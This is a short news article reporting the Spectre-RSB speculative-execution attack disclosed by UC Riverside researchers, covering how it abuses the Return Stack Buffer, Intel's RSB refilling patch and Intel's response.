Another side-channel vulnerability has been identified that could be exploited in a Spectre-Class attack. This attack method is not blocked by previous patches that address the original Spectre flaws. The vulnerability was identified by researchers at the University of California, Riverside (UCR), which recently published details of the attack method which they term Spectre-RSB.
The attack uses the speculative execution feature of modern CPUs which improve performance of the CPU by performing computing operations in advance.
In contrast to previous Spectre attacks, this method uses the Return Stack Buffer (RSB) speculation routine rather than the branch predictor unit. RSB is used to predict return addresses in the speculation process with a high level of accuracy. However, the researchers have shown that it is possible to conduct attacks that “exploit the Return Stack Buffer (RSB) to cause speculative execution of the payload gadget that reads and exposes sensitive information.”
The researchers demonstrated that it is possible to pollute the RSB and gain access to data from other applications on the same CPU and, in another attack, were able to cause a misspeculation that exposed data outside an SGX compartment.
While the Retpoline and Intel’s microcode patches prevent the original Spectre flaw from being exploited, the researchers say these patches do not address the RSB flaw. Intel has released a patch called RSB refilling for some of its CPUs, which disrupts Spectre-RSB attacks that switch into the kernel. The patch was released to address a separate vulnerability but was only rolled out to Core-i7 Skylake and newer processors, not Intel’s Xeon processor line. The researchers recommended the patch be applied on all machines to protect against Spectre-RSB attacks.
Intel responded to a request from Beeping Computer about the flaws and claimed that the Sprectre-RSB attack method is related to the Branch Target Injection vulnerability (CVE-2017-5715) and that existing mitigations can prevent these Spectre-RSB attacks.
The UCR researchers note that while they have not tested the attack method on AMD and ARM processors, they both use RSB to predict return addresses and are likely to also be susceptible to this attack method.